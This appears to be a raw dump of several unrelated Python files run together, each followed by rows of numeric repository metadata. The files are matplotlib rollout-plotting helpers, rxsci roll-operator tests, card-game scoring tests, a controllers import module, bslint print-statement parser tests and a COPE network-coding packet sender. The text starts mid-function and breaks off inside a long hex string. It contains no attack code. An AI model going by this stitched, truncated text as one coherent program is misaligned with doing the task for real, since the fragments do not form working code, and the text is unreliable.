    for i, start in enumerate(range(0, stacked_observations.obs_shape[0], stacked_observations.env_shape_dim0)):
        frame = stacked_observations.obs[rollout_idx, start:start+stacked_observations.env_shape_dim0]
        if frame.dtype in [np.float32, torch.float32]:
            # Bring float images into [0, 1] for imshow.
            frame = rescale_image(frame, (0.0, 1.0), current_scale=im_val_scale)
        if axis_order == 'RCWH':
            # Channel-first -> channel-last, as matplotlib expects.
            frame = np.rollaxis(frame, 0, 3)
        if frame.shape[-1] == 1:
            # Single-channel images are shown as 2-D grayscale.
            frame = frame.squeeze(-1)
        plt.subplot(1, n_stacked, i + 1)
        plt.imshow(frame)
        plt.title('{} of {}'.format(i, n_stacked))
    plt.tight_layout()
    if not noshow:
        plt.show()
def plot_rollout_frames(rollouts, rollout_idx=0, axis_order='RCWH', im_val_scale=(0.0, 1.0), noshow=False,
                        n_channels=3, timestep=0):
    ''' Plot each n_channels-wide frame of one rollout observation at a given timestep.

        Parameters:
            rollouts: a rollout-storage object; this function reads
                rollouts.observations[timestep]
                (NOTE(review): the original docstring described a
                StackedObservationStorage -- confirm the expected type with callers)
            rollout_idx: which rollout to visualize
            axis_order: RCWH = RolloutIdx x Channel x Width x Height
            im_val_scale: If image is a float, the range of the inputs
            noshow: Not implemented -- raises NotImplementedError when True
            n_channels: channels per frame (3 for RGB); the channel axis is
                split into obs.shape[1] // n_channels frames
            timestep: which timestep of the rollout to plot
    '''
    obs = rollouts.observations[timestep]
    n_stacked = obs.shape[1] // n_channels
    if noshow:
        raise NotImplementedError("Bug! Noshow not yet implemented")
    assert axis_order in ['RCWH', 'RWHC']
    fig, ax = plt.subplots(figsize=(15, 15))
    for i, start in enumerate(range(0, obs.shape[1], n_channels)):
        frame = obs[rollout_idx, start:start+n_channels]
        if frame.dtype in [np.float32, torch.float32]:
            # Bring float images into [0, 1] for imshow.
            frame = rescale_image(frame, (0.0, 1.0), current_scale=im_val_scale)
        if axis_order == 'RCWH':
            # Channel-first -> channel-last, as matplotlib expects.
            frame = np.rollaxis(frame, 0, 3)
        if frame.shape[-1] == 1:
            frame = frame.squeeze(-1)
        plt.subplot(1, n_stacked, i + 1)
        plt.imshow(frame)
        plt.title('{} of {}'.format(i, n_stacked))
    plt.tight_layout()
    if not noshow:
        plt.show()
from teas.utils.viz.core import rescale_image
def plot_rollout_sensor_frames(rollouts, rollout_idx=0, axis_order='RCWH', im_val_scale=(0.0, 1.0), noshow=False,
                               n_channels=3, timestep=0, sensor_name='color__pinhole'):
    ''' Plot each n_channels-wide frame of one sensor's observation at a given timestep.

        Same as plot_rollout_frames, but observations are keyed by sensor:
        reads rollouts.observations[sensor_name][timestep].
        NOTE(review): the `from teas...` import just above this function
        rebinds rescale_image away from the .core version imported at the top
        of the file -- confirm which implementation is intended.

        Parameters:
            rollouts: a rollout-storage object with per-sensor observations
                (NOTE(review): original docstring described a
                StackedObservationStorage -- confirm with callers)
            rollout_idx: which rollout to visualize
            axis_order: RCWH = RolloutIdx x Channel x Width x Height
            im_val_scale: If image is a float, the range of the inputs
            noshow: Not implemented -- raises NotImplementedError when True
            n_channels: channels per frame (3 for RGB)
            timestep: which timestep of the rollout to plot
            sensor_name: key into rollouts.observations
    '''
    obs = rollouts.observations[sensor_name][timestep]
    n_stacked = obs.shape[1] // n_channels
    if noshow:
        raise NotImplementedError("Bug! Noshow not yet implemented")
    assert axis_order in ['RCWH', 'RWHC']
    fig, ax = plt.subplots(figsize=(15, 15))
    for i, start in enumerate(range(0, obs.shape[1], n_channels)):
        frame = obs[rollout_idx, start:start+n_channels]
        if frame.dtype in [np.float32, torch.float32]:
            # Bring float images into [0, 1] for imshow.
            frame = rescale_image(frame, (0.0, 1.0), current_scale=im_val_scale)
        if axis_order == 'RCWH':
            # Channel-first -> channel-last, as matplotlib expects.
            frame = np.rollaxis(frame, 0, 3)
        if frame.shape[-1] == 1:
            frame = frame.squeeze(-1)
        plt.subplot(1, n_stacked, i + 1)
        plt.imshow(frame)
        plt.title('{} of {}'.format(i, n_stacked))
    plt.tight_layout()
    if not noshow:
        plt.show()
| 41.959596
| 119
| 0.639384
| 578
| 4,154
| 4.434256
| 0.16782
| 0.042138
| 0.04565
| 0.009364
| 0.874366
| 0.841202
| 0.841202
| 0.831057
| 0.831057
| 0.831057
| 0
| 0.027511
| 0.247472
| 4,154
| 99
| 120
| 41.959596
| 0.792386
| 0.173086
| 0
| 0.771429
| 0
| 0
| 0.05454
| 0
| 0
| 0
| 0
| 0
| 0.042857
| 1
| 0.042857
| false
| 0
| 0.071429
| 0
| 0.114286
| 0.014286
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
faabd22908b9fbbcd541b9f6689e84ccb55e5aca
| 5,498
|
py
|
Python
|
tests/data/test_roll.py
|
maki-nage/rxsci
|
64c9956752cbdd4c65aa9f054b6b28318a056625
|
[
"MIT"
] | 3
|
2021-05-03T13:40:46.000Z
|
2022-03-06T07:59:30.000Z
|
tests/data/test_roll.py
|
maki-nage/rxsci
|
64c9956752cbdd4c65aa9f054b6b28318a056625
|
[
"MIT"
] | 9
|
2020-10-22T21:08:10.000Z
|
2021-08-05T09:01:26.000Z
|
tests/data/test_roll.py
|
maki-nage/rxsci
|
64c9956752cbdd4c65aa9f054b6b28318a056625
|
[
"MIT"
] | 2
|
2021-01-05T16:48:54.000Z
|
2021-08-07T12:51:01.000Z
|
import rx
import rx.operators as ops
import rxsci as rs
from ..utils import on_probe_state_topology
def test_roll():
    """Tumbling roll (window == stride == 3): 5 items split into [1,2,3] then [4,5]."""
    source = [
        rs.OnCreateMux((1,)),
        rs.OnNextMux((1,), 1),
        rs.OnNextMux((1,), 2),
        rs.OnNextMux((1,), 3),
        rs.OnNextMux((1,), 4),
        rs.OnNextMux((1,), 5),
        rs.OnCompletedMux((1,)),
    ]
    actual_result = []
    mux_actual_result = []
    def on_next(i):
        actual_result.append(i)
    store = rs.state.StoreManager(store_factory=rs.state.MemoryStore)
    rx.from_(source).pipe(
        rs.cast_as_mux_observable(),
        rs.state.with_store(
            store,
            rs.data.roll(window=3, stride=3, pipeline=rx.pipe(
                # Capture every event flowing through the inner pipeline.
                ops.do_action(mux_actual_result.append),
            )),
        ),
    ).subscribe(on_next)
    # roll() must pass the outer stream through unchanged.
    assert actual_result == source
    # The first inner event is always the state-topology probe.
    assert type(mux_actual_result[0]) is rs.state.ProbeStateTopology
    # Each window runs as its own child mux: create / 3 items / complete,
    # then create / remaining 2 items / complete.
    assert mux_actual_result[1:] == [
        rs.OnCreateMux((1, (1,)), store),
        rs.OnNextMux((1, (1,)), 1, store),
        rs.OnNextMux((1, (1,)), 2, store),
        rs.OnNextMux((1, (1,)), 3, store),
        rs.OnCompletedMux((1, (1,)), store),
        rs.OnCreateMux((1, (1,)), store),
        rs.OnNextMux((1, (1,)), 4, store),
        rs.OnNextMux((1, (1,)), 5, store),
        rs.OnCompletedMux((1, (1,)), store),
    ]
def test_roll_with_stride():
    """Overlapping roll (window=3, stride=2): consecutive windows share one item."""
    source = [
        rs.OnCreateMux((0 ,)),
        rs.OnNextMux((0,), 1),
        rs.OnNextMux((0,), 2),
        rs.OnNextMux((0,), 3),
        rs.OnNextMux((0,), 4),
        rs.OnNextMux((0,), 5),
        rs.OnNextMux((0,), 6),
        rs.OnCompletedMux((0,)),
    ]
    actual_result = []
    mux_actual_result = []
    def on_next(i):
        actual_result.append(i)
    store = rs.state.StoreManager(store_factory=rs.state.MemoryStore)
    rx.from_(source).pipe(
        rs.cast_as_mux_observable(),
        rs.state.with_store(
            store,
            rs.data.roll(window=3, stride=2, pipeline=rx.pipe(
                # Capture every event flowing through the inner pipeline.
                ops.do_action(mux_actual_result.append),
            )),
        ),
    ).subscribe(on_next)
    # The first inner event is always the state-topology probe.
    assert type(mux_actual_result[0]) is rs.state.ProbeStateTopology
    # Two child muxes (ids 0 and 1) alternate: a new window opens every 2
    # items while the previous one is still filling, so overlapping items
    # (3 and 5) are delivered to both windows.
    assert mux_actual_result[1:] == [
        rs.OnCreateMux((0, (0,)), store),
        rs.OnNextMux((0, (0,)), 1, store),
        rs.OnNextMux((0, (0,)), 2, store),
        rs.OnCreateMux((1, (0,)), store),
        rs.OnNextMux((0, (0,)), 3, store),
        rs.OnCompletedMux((0, (0,)), store),
        rs.OnNextMux((1, (0,)), 3, store),
        rs.OnNextMux((1, (0,)), 4, store),
        rs.OnCreateMux((0, (0,)), store),
        rs.OnNextMux((0, (0,)), 5, store),
        rs.OnNextMux((1, (0,)), 5, store),
        rs.OnCompletedMux((1, (0,)), store),
        rs.OnNextMux((0, (0,)), 6, store),
        rs.OnCompletedMux((0, (0,)), store),
    ]
def test_roll_identity():
    """roll(1, 1) wraps every single item in its own create/next/complete window."""
    source = [
        rs.OnCreateMux((1,)),
        rs.OnNextMux((1,), 1),
        rs.OnNextMux((1,), 2),
        rs.OnNextMux((1,), 3),
        rs.OnNextMux((1,), 4),
        rs.OnCompletedMux((1,)),
    ]
    actual_result = []
    mux_actual_result = []
    def on_next(i):
        actual_result.append(i)
    store = rs.state.StoreManager(store_factory=rs.state.MemoryStore)
    rx.from_(source).pipe(
        rs.cast_as_mux_observable(),
        rs.state.with_store(
            store,
            rs.data.roll(1, 1, pipeline=rx.pipe(
                # Capture every event flowing through the inner pipeline.
                ops.do_action(mux_actual_result.append),
            )),
        ),
    ).subscribe(on_next)
    # roll() must pass the outer stream through unchanged.
    assert actual_result == source
    # The first inner event is always the state-topology probe.
    assert type(mux_actual_result[0]) is rs.state.ProbeStateTopology
    # One window per item: create / next / complete, four times.
    assert mux_actual_result[1:] == [
        rs.OnCreateMux((1, (1,)), store),
        rs.OnNextMux((1, (1,)), 1, store),
        rs.OnCompletedMux((1, (1,)), store),
        rs.OnCreateMux((1, (1,)), store),
        rs.OnNextMux((1, (1,)), 2, store),
        rs.OnCompletedMux((1, (1,)), store),
        rs.OnCreateMux((1, (1,)), store),
        rs.OnNextMux((1, (1,)), 3, store),
        rs.OnCompletedMux((1, (1,)), store),
        rs.OnCreateMux((1, (1,)), store),
        rs.OnNextMux((1, (1,)), 4, store),
        rs.OnCompletedMux((1, (1,)), store),
    ]
def test_roll_count_without_store():
    """A tumbling roll (window == stride) without a configured store must error."""
    errors = []
    operator = rs.data.roll(window=3, stride=3, pipeline=rx.pipe())
    rx.from_([1, 2, 3, 4]).pipe(operator).subscribe(on_error=errors.append)
    assert type(errors[0]) is ValueError
def test_roll_without_store():
    """An overlapping roll (stride < window) without a configured store must error."""
    errors = []
    operator = rs.data.roll(window=3, stride=2, pipeline=rx.pipe())
    rx.from_([1, 2, 3, 4]).pipe(operator).subscribe(on_error=errors.append)
    assert type(errors[0]) is ValueError
def test_forward_topology_probe_1():
    """roll(1, 1) forwards exactly one state-topology probe downstream."""
    probes = []
    items = [1, 2, 3, 4]
    inner = rx.pipe(
        rs.data.roll(1, 1, pipeline=rx.pipe()),
        on_probe_state_topology(probes.append),
    )
    rx.from_(items).pipe(
        rs.state.with_memory_store(inner),
    ).subscribe()
    assert len(probes) == 1
def test_forward_topology_probe_2():
    """roll(2, 1) forwards exactly one state-topology probe downstream."""
    probes = []
    items = [1, 2, 3, 4]
    inner = rx.pipe(
        rs.data.roll(2, 1, pipeline=rx.pipe()),
        on_probe_state_topology(probes.append),
    )
    rx.from_(items).pipe(
        rs.state.with_memory_store(inner),
    ).subscribe()
    assert len(probes) == 1
| 27.083744
| 70
| 0.548381
| 693
| 5,498
| 4.181818
| 0.08658
| 0.091787
| 0.086957
| 0.037267
| 0.900621
| 0.849551
| 0.830228
| 0.816425
| 0.81539
| 0.772602
| 0
| 0.041385
| 0.274827
| 5,498
| 202
| 71
| 27.217822
| 0.685478
| 0
| 0
| 0.725
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.075
| 1
| 0.0625
| false
| 0
| 0.025
| 0
| 0.0875
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fabb9304670100fdfece1a33c498042276288c86
| 5,294
|
py
|
Python
|
ch_12/tests/test_cards.py
|
real-slim-chadi/Python-Object-Oriented-Programming---4th-edition
|
7c486866171786b620795fa33a79ec9ac9a8ba1b
|
[
"MIT"
] | 43
|
2021-06-03T18:39:09.000Z
|
2022-03-29T20:32:13.000Z
|
ch_12/tests/test_cards.py
|
real-slim-chadi/Python-Object-Oriented-Programming---4th-edition
|
7c486866171786b620795fa33a79ec9ac9a8ba1b
|
[
"MIT"
] | 9
|
2022-03-12T01:04:07.000Z
|
2022-03-12T01:05:01.000Z
|
ch_12/tests/test_cards.py
|
real-slim-chadi/Python-Object-Oriented-Programming---4th-edition
|
7c486866171786b620795fa33a79ec9ac9a8ba1b
|
[
"MIT"
] | 36
|
2021-06-19T07:14:09.000Z
|
2022-03-12T22:17:09.000Z
|
"""
Python 3 Object-Oriented Programming
Chapter 12. Advanced Python Design Patterns
"""
from pytest import *
import card_games
def test_cribbage_hand():
    """A 29-style hand: three fives plus the jack, starter five of the same suit."""
    factory = card_games.CribbageFactory()
    suit = card_games.Suit
    cards = [
        factory.make_card(5, suit.Clubs),
        factory.make_card(5, suit.Diamonds),
        factory.make_card(5, suit.Hearts),
        factory.make_card(11, suit.Spades),
    ]
    starter = factory.make_card(5, suit.Spades)
    hand = factory.make_hand(*cards)
    actual = sorted(hand.upcard(starter).scoring())
    trick = card_games.CribbageTrick
    # Eight fifteens, six pairs, and his nobs for the matching jack.
    assert actual == [trick.Fifteen] * 8 + [trick.Pair] * 6 + [trick.Right_Jack]
def test_poker_hand_sf():
    """Five consecutive clubs (5..9) score a straight flush."""
    factory = card_games.PokerFactory()
    cards = [
        factory.make_card(rank, card_games.Suit.Clubs)
        for rank in range(5, 10)
    ]
    hand = factory.make_hand(*cards)
    assert hand.scoring() == [card_games.PokerTrick.StraightFlush]
def test_poker_hand_4():
    """All four fives plus a six kicker score as four of a kind."""
    poker = card_games.PokerFactory()
    suits = card_games.Suit
    held = [
        poker.make_card(5, s)
        for s in (suits.Clubs, suits.Diamonds, suits.Hearts, suits.Spades)
    ]
    held.append(poker.make_card(6, suits.Spades))
    hand = poker.make_hand(*held)
    assert hand.scoring() == [card_games.PokerTrick.Four]
def test_poker_hand_fh():
    """Three fives over a pair of sixes score as a full house."""
    poker = card_games.PokerFactory()
    suits = card_games.Suit
    spec = [
        (5, suits.Clubs),
        (5, suits.Diamonds),
        (5, suits.Hearts),
        (6, suits.Spades),
        (6, suits.Spades),
    ]
    hand = poker.make_hand(*[poker.make_card(rank, suit) for rank, suit in spec])
    assert hand.scoring() == [card_games.PokerTrick.FullHouse]
def test_poker_hand_flush():
    """Five clubs with a rank gap (5,6,7,8,10) score as a flush only."""
    poker = card_games.PokerFactory()
    held = [poker.make_card(rank, card_games.Suit.Clubs) for rank in (5, 6, 7, 8, 10)]
    hand = poker.make_hand(*held)
    assert hand.scoring() == [card_games.PokerTrick.Flush]
def test_poker_hand_straight():
    """Five consecutive ranks in mixed suits score as a straight.

    Bug fix: this test was a verbatim copy of ``test_poker_hand_flush``
    (ranks 5,6,7,8,10 all in clubs, asserting ``Flush``) and therefore
    never exercised straight detection.  It now deals a genuine straight
    with mixed suits so the flush branch cannot fire.
    """
    poker = card_games.PokerFactory()
    suits = card_games.Suit
    # Mixed suits break the flush; consecutive ranks 5..9 form a straight.
    spec = [
        (5, suits.Clubs),
        (6, suits.Diamonds),
        (7, suits.Hearts),
        (8, suits.Spades),
        (9, suits.Clubs),
    ]
    hand = poker.make_hand(*[poker.make_card(rank, suit) for rank, suit in spec])
    # NOTE(review): assumes card_games.PokerTrick defines a Straight member
    # alongside StraightFlush -- confirm against card_games.
    assert hand.scoring() == [card_games.PokerTrick.Straight]
def test_poker_hand_3():
    """Three fives plus two distinct kickers score as three of a kind."""
    poker = card_games.PokerFactory()
    suits = card_games.Suit
    spec = [
        (5, suits.Clubs),
        (5, suits.Diamonds),
        (5, suits.Hearts),
        (6, suits.Spades),
        (7, suits.Spades),
    ]
    hand = poker.make_hand(*[poker.make_card(rank, suit) for rank, suit in spec])
    assert hand.scoring() == [card_games.PokerTrick.Three]
def test_poker_hand_22():
    """A pair of fives and a pair of sixes score as two pair."""
    poker = card_games.PokerFactory()
    suits = card_games.Suit
    spec = [
        (5, suits.Clubs),
        (5, suits.Diamonds),
        (6, suits.Hearts),
        (6, suits.Spades),
        (7, suits.Spades),
    ]
    hand = poker.make_hand(*[poker.make_card(rank, suit) for rank, suit in spec])
    assert hand.scoring() == [card_games.PokerTrick.TwoPair]
def test_poker_hand_2():
    """A single pair of fives with three distinct kickers scores as a pair."""
    poker = card_games.PokerFactory()
    suits = card_games.Suit
    spec = [
        (5, suits.Clubs),
        (5, suits.Diamonds),
        (6, suits.Hearts),
        (7, suits.Spades),
        (8, suits.Clubs),
    ]
    hand = poker.make_hand(*[poker.make_card(rank, suit) for rank, suit in spec])
    assert hand.scoring() == [card_games.PokerTrick.Pair]
def test_poker_hand_nothing():
    """Disconnected ranks in mixed suits produce no scoring tricks at all."""
    poker = card_games.PokerFactory()
    suits = card_games.Suit
    spec = [
        (3, suits.Clubs),
        (5, suits.Diamonds),
        (7, suits.Hearts),
        (9, suits.Spades),
        (11, suits.Clubs),
    ]
    hand = poker.make_hand(*[poker.make_card(rank, suit) for rank, suit in spec])
    assert hand.scoring() == []
| 36.510345
| 66
| 0.68266
| 695
| 5,294
| 4.94964
| 0.089209
| 0.219767
| 0.218023
| 0.125581
| 0.882558
| 0.882558
| 0.882558
| 0.856977
| 0.827616
| 0.815116
| 0
| 0.014554
| 0.195315
| 5,294
| 144
| 67
| 36.763889
| 0.792958
| 0.0153
| 0
| 0.674419
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.077519
| 1
| 0.077519
| false
| 0
| 0.015504
| 0
| 0.093023
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
fae5b1b2b27215f24c172ee008794bdc02fbb184
| 556
|
py
|
Python
|
Backend/autonomus/controllers/__init__.py
|
IrinaMBejan/Autonom
|
4a97da1b26ed22e3ec8bb939359148765392b692
|
[
"MIT"
] | 2
|
2019-03-08T10:04:35.000Z
|
2020-03-14T15:24:56.000Z
|
Backend/autonomus/controllers/__init__.py
|
IrinaMBejan/Autonom
|
4a97da1b26ed22e3ec8bb939359148765392b692
|
[
"MIT"
] | null | null | null |
Backend/autonomus/controllers/__init__.py
|
IrinaMBejan/Autonom
|
4a97da1b26ed22e3ec8bb939359148765392b692
|
[
"MIT"
] | 2
|
2019-03-16T14:47:36.000Z
|
2020-04-28T14:09:45.000Z
|
from .events_controller import get_all_events, get_event, update_event
from .tags_controller import add_tag, get_all_tags, get_tag
from .users_controller import Roles, remove_token, add_tag_to_user
from .users_controller import add_user, exists_user, get_user_role, get_users
from .users_controller import generate_token, update_token, verify_token
from .users_controller import add_event_to_user, remove_event_from_user
from .users_controller import remove_tag_from_user, get_user_events, get_user_tags
from .events_controller import get_events_next_days
| 61.777778
| 82
| 0.877698
| 90
| 556
| 4.933333
| 0.255556
| 0.288288
| 0.213964
| 0.281532
| 0.331081
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.082734
| 556
| 8
| 83
| 69.5
| 0.870588
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
faeb64836f99f68c680034bf6e6433eb18d8540e
| 3,620
|
py
|
Python
|
tests/parse_tests/statement_reduction_tests/question_mark_parse_test.py
|
alexmakii/bslint
|
0795467166ca10c362fecc12ac17765cb85b659b
|
[
"BSD-3-Clause"
] | null | null | null |
tests/parse_tests/statement_reduction_tests/question_mark_parse_test.py
|
alexmakii/bslint
|
0795467166ca10c362fecc12ac17765cb85b659b
|
[
"BSD-3-Clause"
] | null | null | null |
tests/parse_tests/statement_reduction_tests/question_mark_parse_test.py
|
alexmakii/bslint
|
0795467166ca10c362fecc12ac17765cb85b659b
|
[
"BSD-3-Clause"
] | 1
|
2017-04-12T09:39:54.000Z
|
2017-04-12T09:39:54.000Z
|
import unittest
import bslint.constants as const
from tests.resources.common.test_methods import CommonMethods as Common
class TestQuestionMarkParse(unittest.TestCase):
    """Parser reduction tests for the '?' (print) statement."""

    @classmethod
    def setUpClass(cls):
        cls.common = Common()

    def _match_print(self, source):
        # Every positive case must reduce to a PRINT_STMT.
        self.common.match_statement(const.PRINT_STMT, source)

    def _expect_error(self, source):
        # Negative cases must leave the parser in an error status.
        self.common.status_error(source)

    def test_question_mark_value(self):
        self._match_print("print 4")

    def test_question_mark_id(self):
        self._match_print("? x")

    def test_question_mark_var_as(self):
        self._match_print("? x = 3")

    def test_question_mark_function_call(self):
        self._match_print("? x()")

    def test_question_mark_idoperator_value(self):
        self._match_print("? x^5")

    def test_question_mark_value_comma_value(self):
        self._match_print("? 3,4")

    def test_question_mark_value_comma_id(self):
        self._match_print("? 3,d")

    def test_question_mark_value_comma_function_call(self):
        self._match_print("? 3,x()")

    def test_question_mark_value_comma_variable_assignment(self):
        self._match_print("? 3,x=4")

    def test_question_mark_value_comma_argument(self):
        self._match_print("? 3,3,4")

    def test_question_mark_variable_assignment_comma_function_call(self):
        self._match_print("? Y=4,x()")

    def test_question_mark_variable_assignment_comma_variable_assignment(self):
        self._match_print("? Y=4,x=4")

    def test_question_mark_variable_assignment_comma_argument(self):
        self._match_print("? x=1,4,4")

    def test_question_mark_value_semi_colon_value(self):
        self._match_print("? 3;4")

    def test_question_mark_value_semi_colon_id(self):
        self._match_print("? 3;d")

    def test_question_mark_value_semi_colon_function_call(self):
        self._match_print("? 3;x()")

    def test_question_mark_value_semi_colon_variable_assignment(self):
        self._match_print("? 3;x=4")

    def test_question_mark_value_semi_colon_argument(self):
        self._match_print("? 4;4,4")

    def test_question_mark_idsemi_colon_value(self):
        self._match_print("? X;4")

    def test_question_mark_idsemi_colon_id(self):
        self._match_print("? X;d")

    def test_question_mark_idsemi_colon_function_call(self):
        self._match_print("? Y;x()")

    def test_question_mark_idsemi_colon_variable_assignment(self):
        self._match_print("? Y;x=4")

    def test_question_mark_idsemi_colon_argument(self):
        self._match_print("? x;4;4")

    def test_question_mark_variable_assignment_semi_colon_variable_assignment(self):
        self._match_print("? Y=4;x=4")

    def test_question_mark_variable_assignment_semi_colon_argument(self):
        self._match_print("? x=1;4;4")

    def test_invalid_while_parenthesis(self):
        self._expect_error("? )")

    def test_invalid_while_for(self):
        self._expect_error("? (for)")

    def test_invalid_while_end_while(self):
        self._expect_error("? endwhile")
| 38.510638
| 84
| 0.741436
| 513
| 3,620
| 4.836257
| 0.107212
| 0.079
| 0.158001
| 0.191455
| 0.873841
| 0.827489
| 0.794841
| 0.76582
| 0.719871
| 0.667876
| 0
| 0.011692
| 0.149448
| 3,620
| 93
| 85
| 38.924731
| 0.794089
| 0
| 0
| 0
| 0
| 0
| 0.051105
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.460317
| false
| 0
| 0.047619
| 0
| 0.52381
| 0.015873
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 9
|
4f0aa28a4cd1aa1cc4db0528e47e9460b7856836
| 5,876
|
py
|
Python
|
mininet_dev/python_networking/traffic_generator_thread.py
|
dschoonwinkel/MininetNetworkHelp
|
48cddd94f84be3927c15926f1c046a99f36cefd2
|
[
"Apache-2.0"
] | null | null | null |
mininet_dev/python_networking/traffic_generator_thread.py
|
dschoonwinkel/MininetNetworkHelp
|
48cddd94f84be3927c15926f1c046a99f36cefd2
|
[
"Apache-2.0"
] | null | null | null |
mininet_dev/python_networking/traffic_generator_thread.py
|
dschoonwinkel/MininetNetworkHelp
|
48cddd94f84be3927c15926f1c046a99f36cefd2
|
[
"Apache-2.0"
] | null | null | null |
import cope_packet
import threading
import time
import coding_utils
import network_utils
import sys
# Default send target; each value can be overridden positionally via argv
# in main(): argv[1] = interface, argv[2] = dest_ip, argv[3] = dest_hwaddr.
interface = "eth0"
dest_ip = "10.0.0.1"
# Broadcast MAC by default -- presumably so the COPE packet reaches any
# listener on the segment; confirm against cope_packet.send_COPE_packet.
dest_hwaddr = "ff:ff:ff:ff:ff:ff"
def read_data_from_file(f1, payload_len):
    """Read and return up to ``payload_len`` bytes from the open file ``f1``."""
    payload = f1.read(payload_len)
    return payload
class COPE_sender(threading.Thread):
def __init__(self, name, src_ip, dest_ip, dest_hwaddr, interface):
threading.Thread.__init__(self)
self.name = name
self.src_ip = src_ip
self.dest_ip = dest_ip
self.dest_hwaddr = dest_hwaddr
self.interface = interface
def run(self):
# f1 = open("/home/osboxes/Development/NetworkCoding/mininet_dev/python_networking/trafficdump.bin", "r")
# COPE_payload = read_data_from_file(f1, 1470)
COPE_payload = str("Hello1")
# COPE_payload = "\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x
